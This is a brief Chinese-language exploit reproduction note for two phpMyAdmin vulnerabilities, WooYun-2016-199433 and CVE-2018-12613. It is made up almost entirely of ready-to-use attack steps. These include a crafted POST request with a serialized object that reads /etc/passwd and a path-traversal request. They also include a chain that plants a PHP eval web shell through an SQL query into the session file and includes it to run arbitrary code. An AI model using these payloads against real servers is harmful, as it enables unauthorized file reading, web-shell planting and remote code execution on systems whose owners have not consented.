phpMyAdmin
1.漏洞复现
WooYun-2016-199433 反序列化任意文件读取
影响范围:phpMyAdmin 2.x
POST请求进行任意文件读取
POST /scripts/setup.php HTTP/1.1 Host: 192.168.135.131:8080 Connection: close Content-Length: 80 Content-Type: application/x-www-form-urlencoded configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test
CVE-2018-12613 文件包含漏洞
影响范围:phpMyAdmin 4.8.0、4.8.1
GET请求进行文件包含,/index.php?target=sql.php?../../../../../etc/passwd
Session包含(也可以尝试日志投毒):
执行SQL语句将PHP一句话保存到临时文件($_POST可能无效)
select "<?php @eval($_GET[1]);?>"
F12查看Cookie的phpMyAdmin值(841d39f9673beed785423110f508d7f1)
临时文件名为sess_phpMyAdmin值(sess_841d39f9673beed785423110f508d7f1)
文件包含GetShell,/index.php?target=sql.php?../../../../../tmp/sess_841d39f9673beed785423110f508d7f1&1=phpinfo();